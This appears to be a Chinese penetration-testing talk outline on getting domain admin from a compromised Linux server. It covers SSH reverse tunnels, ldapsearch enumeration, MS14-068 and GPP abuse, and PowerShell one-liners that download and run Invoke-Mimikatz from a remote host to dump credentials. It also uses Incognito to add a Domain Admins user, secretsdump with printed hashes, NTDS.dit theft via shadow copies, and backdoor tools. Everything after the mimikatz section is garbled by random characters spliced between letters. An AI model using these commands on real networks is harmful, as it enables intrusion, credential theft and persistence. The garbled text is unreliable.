渗透测试中的技巧

渗透测试中的技巧Mickey议题的内容：快速获取域权限的方法黑客工具使用的逆向思维钓鱼站的access注入waf绕过目前已经掌握的情况搞定一台边界的Linux服务器

数据库配置文件中有注释掉的一个域帐号

当前机器不在域中

我有root权限

怎么收集信息？准备工作：方便本地kali下的工具使用，开个反弹socks5 ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=31337 ssh-o"StrictHostKeyCheckingno"-oUserKnownHostsFile=/dev/null-T-fND:8888mail@-p31337

ssh-o"StrictHostKeyCheckingno"-T-fNR8888::8888proxy@公网IP或者用CobaltStrike的beacon你为什么不直接用reGeorg?

因为当时提示trimDirectiveWhitespaces错误！！域内信息收集Windows下很多工具获取域信息

dsquery，AdFind

ldifde，Sysinternals'ADExplorer等linux下呢？我用ldapsearch+adoffline.pyroot@Gamer:~/#proxychains

ldapsearch-hAD1.corp.target.net-x-D"mickey@corp.target.net"-b"dc=corp,dc=target,dc=net"-Epr=1000/noprompt-oldif-wrap=no-w'password!@#'>clint.ldif域内信息收集ldapsearch+adoffline.py组合哪里好？

离线的！！可搜索的！！查看description,comment,titleorinfo域有内容的sqlite>selectcn,description,title,comment,infofromview_userswhere(descriptionISNOTNULLortitleISNOTNULLorcommentISNOTNULLorinfoISNOTNULL);显示有计算机description的sqlite>selectcn,description,infoFROMview_computersWHERE(descriptionISNOTNULLorinfoISNOTNULL);显示域内的winxp和2000主机sqlite>selectdnsHostName,description,info,operatingSystemfromview_computerswhereoperatingSystemLIKE'%Windows%2000%'ORoperatingSystemLIKE'%Windows%XP%';查看域管理员sqlite>selectmember_cnfromview_activegroupuserswheregroup_cn="DomainAdmins";域内信息收集快速获取域权限的方法

LowHangingFruit[找软柿子捏]神器kekeo[ms14068,比PyKEK方便] GPP[KB2962486]

十分钟爱SQLSERVER弱口令和潜在的SilverTicket攻击

[SPN]

本地administrator帐户通杀+Incognito

DomainCache的破解

管理员配置错误十分钟爱SQLSERVER弱口令和潜在的SilverTicket攻击[SPN]

明文膀密码超抓取本地矿明文通密码母抓取:no闪hu赖p衬py球th塘on怪-相m桑Si德mp庙le乓HT藏TP喉Se鼠rv扛er含8受88逐8&po挎we嘉rs雪he肥ll晓"历IE是X糕(N快ew土-O厘bj炸ec密t打Ne让t.贷We霞bC抽li头en聋t)废.D概ow盛nl疫oa烦dS畅tr肾in炭g(精'h誉tt硬p:辞//赔19型2.委16央8.谁0.斤4/颈In领vo园ke旦-M阁im伴ik学at磨z.暗ps股1'即);掠In欣vo系ke罢-M劳im循ik都at找z闯–D望um旷pC通er蹈ts远程好主机汪明文驰密码昏抓取如果幅开启奴了P艳ow冬er泥sh豆el惯l枣Re标mo吴ti辛ng非（类觉似W议in摆RM辉，开地放4亮70赏01娘端溜口)损D抛um犬p肤远程锐机器流的密窝码po静we粱rs耕he窜ll亮“挖IE识X绵(N彻ew柿-O术bj格ec昏t肿Ne榴t.痛We壮bC半li态en由t)软.D斯ow踩nl讨oa阀dS砍tr辜in乐g(发'h救tt喇p:雨//范19猾2.径16田8.问0.观4/沿In顾vo驻ke客-M喂im夫ik第at穷z.墙ps鹿1'杨);卷I袋nv珍ok秆e-疯Mi村mi夺ka撕tz柱-拖Du为mp诸Cr妈ed烛s顽-C宵om象pu我te耕rN巾am滑e兼@(餐‘c械om惧pu烛te黑r1餐′,旗‘服co杜mp险ut凶er献2′铜)”本地ad绢mi损ni犹st层ra钢to贸r帐户坑通杀+In诉co贪gn粪it包o列举显所ho山st吸s.也tx蜂t里主顺机所足有的to瓜ke择n,将pe迎nt呀es岔t用户赌加入苍到域煎管理厚员组D:铺\>隙in南co翅gn屡it肚o.远ex软e浅-f筑h椒os刻ts阿.t饭xt势-复u至ad胆mi逼ni蹦st纲ra辈to搬r竹-pco民rp盾12尸34-n封2好0兵ad属d_朴gr守ou伞p_妖us趋er度-宜h缸dc饱1.拾"D仆om胁ai跨n唯Ad察mi矿ns欧"pe屋nt伶es惜tDo腥ma攀in分Ca吓ch铃e的破迟解没法拿用于沫pa烤ssth详ehas抛h抓取废工具ht蠢tp狮s:详//匙gi陶th霉ub穷.c荐om榨/c美or病es狠ec狼ur葛it每y/夜im药pa岁ck合et$s驾ec谢re慢ts淡du锤mp尘.p鹿y负-s帆am非s灵am陡.s阻av却e宿-s绘ec宋ur劫it敲y猫se共cu泄ri辛ty洞.s芦av氧e府-s黑ys德te谈m心sy染st泳em脚.s塘av御e买LO准CA疏L[*水]咱Du创mp防in侍g锯ca温ch体ed敞d丝式om哲ai显n勾lo怖go秒n笼in榨fo崇rm完at肠io滩n捎(u染id勉:e臭nc宏ry丧pt哥ed良Ha垒sh吓:l剃on瞧gD稼om负ai躁n:扫do珠ma喜in萄)hd哗es占:6促ec意74跃66乌16厘50赢37萌7d因f4沙88累41若54耕15蛋bf谜10钻32填1:甚ta箭rg莲et偏.c搞or惊p.渡co柱m:撤TA题RG孙ET钟::改:Ad悠mi左ni雁st趁ra学to拘r:丈c4尊a8赤50是e0沾fe尿e5拣af朝32饺4a亿57捎fd皇2e缝eb泪8d药bd泰24麻:t惭ar吴ge页t.冶CO厕RP徐.C赶OM乏:T罢AR博GE升T:踪蝶::破解掌时注忽意格程式问谋题ms榜ca耍sh料(封xp兼,脉w2斯k3犯)ms排ca散sh退2真(v锻is跳ta锻,行w7担,思w2慌k8顽…捏)支持商破解鉴的工纷具彩虹绝表：Ca医inGP颤U：Ha抹sh床Ca限t管理技员配狭置错臣误如果天计算轧机帐两号在”D姜om王ai猪n同Ad改mi表ns蛇”或者“A恨D赠Ba蹄ck剂up早s”组里那么盐登陆刊到该娃计算昂机的萌管理蹦用户微是不捧是能庭获取订到”D逼om溪ai诱n仅ad纹mi吐ns灰”组的沟权限光？维持厕域权病限金钥滩匙[h脸tt太p:哄//dr幻玉op匙s.敢wo问oy盟un喘.o允rg戚/t窄ip羊s/匙95事91芦]du瓣mp所有彻域HA休SH撤[己gs日ec矮du叮mpv2记b5/卷影糊副本]边界丧服务为器留we加bs放he占ll文件恭服务晒器用BD圣F插PEev责il山pa琴ss吓fi挡lt极er盯住坦管理换员邮员箱和踩聊天金软件VP里N入口du漠mp所有幼域HA现SH颗[上gs水ec猾du鸣mp捡v际2b滤5/卷影英副本]C:维\>任cs哲cr纽奉ip成t眨vs程so态wn踪蝶.v格bs肃/攀li艺stC:表\>愤cs消cr可ip危t站vs介so智wn换.v肉bs瓶/忘st娃at炼usC:障\>写cs乒cr使ip井t待vs亦so妹wn啊.v樱bs宅/希mo炕deC:纹\>塞cs信cr瓶ip刷t衬vs避so离wn巩.v纱bs田/浮cr青ea可teC:醋\>跪co岸py滚\闸\?四\G希LO食BA顿LR花OO鹅T\速De绿vi廊ce狮\H牵ar规dd用is平kV敌ol甜um烫eS集ha灿do胁wC休op制y1割\W恢in乘do劳ws豆\S站ys栽te岸m3访2\市co裁nf母ig熊\S永YS译TE淡M妥.C:鄙\>却co堆py苦\维\?龟\G束LO耻BA烂LR撑OO渗T\债De杂vi舒ce督\H幸ar瞎dd胀is胞kV恩ol涛um稍eS难ha涛do泼wC生op栽y1卖\W存in干do纵ws米\S刺ys弟te宁m3誉2\傍nt丘ds吸\N冶TD坚S.汽DI滚T册.C:尝\>莲cs顷cr慨ip侧t柱vs歪so读wn慨.v舅bs废/懒de使le挠te闸{丑D7里9A舌4E毅73沿-C某CA拣B-盖41聚51喝-B超72千6-川55明F6技C5桑C3氧A8悠53票}C:谣\>园cs部cr遇ip袜t杯vs贞so舍wn筝.v缎bs复/欺st厦opPa御ss移ca狂pe扁W达in叶do畅ws名P外as煤sw劫or桨d恩Re策co填ve届ry文件娘服务纪器用BD讯F插PEht任tp尘s:悲//誉gi触th偶ub践.c践om纱/s摩ec阅re辨ts死qu孤ir耍re睬l/岸th拣e-岔ba畜ck湾do糕or鸡-f耻ac敲to附ry支持渣多种螺文件介格式(P霜E/饼EL弦F/名Ma然ch殿-O望)支持途代码揭签名ev秋il抬pa肾ss箩fi趴lt旁erht手tp促s:笛//室gi召st垒.g肚it悠hu横b.灾co世m/挡mu危bi鹿x/睛65该14葛31娃1#需fi壳le漫-e欠vi蝇lp者as犬sf踪蝶il行te泰r-魔cp抬p黑客尘工具绍使用桑的逆这向思爪维NB研NS诊欺骗欢除了铜用于像扩展识其他配服务霜器，娇欺骗点本地秀服务坚器？WP痕AD欺骗语除了疮用于激扩展早其他孟服务眯器，煌欺骗